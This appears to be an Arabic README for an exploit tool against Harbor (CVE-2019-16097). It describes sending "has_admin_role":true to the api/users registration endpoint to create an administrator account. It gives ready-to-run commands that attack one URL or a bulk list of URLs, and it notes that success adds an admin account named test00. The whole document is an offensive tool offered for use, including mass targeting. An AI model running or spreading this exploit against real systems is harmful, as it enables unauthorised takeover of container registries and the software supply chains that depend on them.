
harbor(<1.7.6/1.8.3) تصعيد الامتياز (CVE-2019-16097)
في عام 201909، تم الكشف عن ثغرة في Harbor تسمح بإضافة مسؤول باستخدام وظيفة التسجيل. من خلال استغلال واجهة التسجيل api/users، وإنشاء معامل POST "has_admin_role":true، يمكن إضافة مسؤول مباشرة. هذه الأداة تدعم الكشف عن رابط واحد أو بالجملة.
python2.7
pip install requests
المساعدة: python harbor-give-me-admin.py -h

اختبار رابط واحد: python harbor-give-me-admin.py -u "https://www.xxx.com/"
// إذا نجح الاستغلال، سيتم إضافة حساب مسؤول test00، يرجى توخي الحذر!

اختبار بالجملة: python harbor-give-me-admin.py -f urls,txt
// إذا نجح الاستغلال، سيتم إضافة حساب مسؤول test00، يرجى توخي الحذر!
gmail:[email protected]